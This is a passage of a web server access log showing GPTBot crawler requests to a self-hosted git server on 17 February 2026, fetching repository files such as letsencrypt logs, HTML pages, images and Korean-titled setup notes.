AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx" [Client 74.7.227.38] [Length 10112] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx" -[17/Feb/2026:13:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/releases.rss" [Client 74.7.227.38] [Length 350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/releases" -[17/Feb/2026:13:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" -[17/Feb/2026:13:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10121] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 74.7.227.38] [Length 22711] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" -[17/Feb/2026:13:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153441] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10989] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10991] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10989] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153439] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10646] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:13:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 74.7.227.38] [Length 25660] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:13:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:13:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10861] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 74.7.227.38] [Length 21807] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15178] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" -[17/Feb/2026:13:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" -[17/Feb/2026:13:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" -[17/Feb/2026:13:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" -[17/Feb/2026:13:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" -[17/Feb/2026:13:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14699] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" -[17/Feb/2026:13:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" -[17/Feb/2026:13:39:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:13:39:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:13:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" -[17/Feb/2026:13:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" -[17/Feb/2026:13:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14877] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692333] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498818] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498816] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429933] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 